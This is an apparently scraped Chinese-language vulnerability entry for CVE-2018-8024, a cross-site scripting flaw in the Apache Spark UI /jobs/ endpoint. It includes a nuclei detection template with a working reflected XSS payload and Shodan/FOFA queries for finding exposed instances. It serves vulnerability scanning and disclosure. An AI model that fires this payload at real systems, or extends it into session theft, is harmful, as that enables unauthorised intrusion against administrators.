漏洞信息
漏洞名称: Apache Spark UI 跨站脚本漏洞
漏洞编号:
漏洞类型: 跨站可执行脚本
漏洞等级: 中危
漏洞描述: Apache Spark是一个开源的大数据处理框架,广泛用于大规模数据处理、机器学习等场景。其UI组件提供了一个Web界面,用于监控和管理Spark作业。此次漏洞影响的是Apache Spark UI组件,版本低于2.3.2的部署。漏洞的根源在于/jobs/端点未对查询字符串参数进行适当的清理,导致跨站脚本(XSS)攻击成为可能。攻击者可以构造恶意的URL,当用户访问时,会执行攻击者预设的JavaScript代码。由于Spark UI通常由管理员或具有高权限的用户访问,这种攻击可能导致敏感信息泄露、会话劫持等安全问题。虽然攻击需要用户交互,但由于Spark UI的管理性质,攻击者可能通过社交工程等手段诱导用户点击恶意链接。此漏洞的CVSS评分为6.1,属于中危级别,建议用户尽快升级到不受影响的版本。
产品厂商: apache
产品名称: spark
影响版本: * < 2.3.2
搜索语法: title=”spark master at”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/3442666f0f77cfb9c0212eb8044484062643effd/http%2Fcves%2F2018%2FCVE-2018-8024.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44
| id: CVE-2018-8024
info: name: Apache Spark UI - Cross-Site Scripting author: ritikchaddha severity: medium description: | Apache Spark UI before 2.3.2 is vulnerable to XSS via unsanitized query string parameters in the /jobs/ endpoint. reference: - https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-8024 - https://nvd.nist.gov/vuln/detail/CVE-2018-8024 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-8024 cwe-id: CWE-79 epss-score: 0.52728 epss-percentile: 0.97804 cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: apache product: spark shodan-query: title:"spark master at" fofa-query: title="spark master at" tags: cve,cve2018,spark,xss,ui
http: - method: GET path: - "{{Host}}:{{Port}}/jobs/?\"'><script>alert(document.domain)</script>"
matchers-condition: and matchers: - type: dsl dsl: - "status_code == 200" - "contains(content_type, 'text/html')" - "contains_all(body, '><script>alert(document.domain)</script>', 'Spark Jobs')" condition: and
|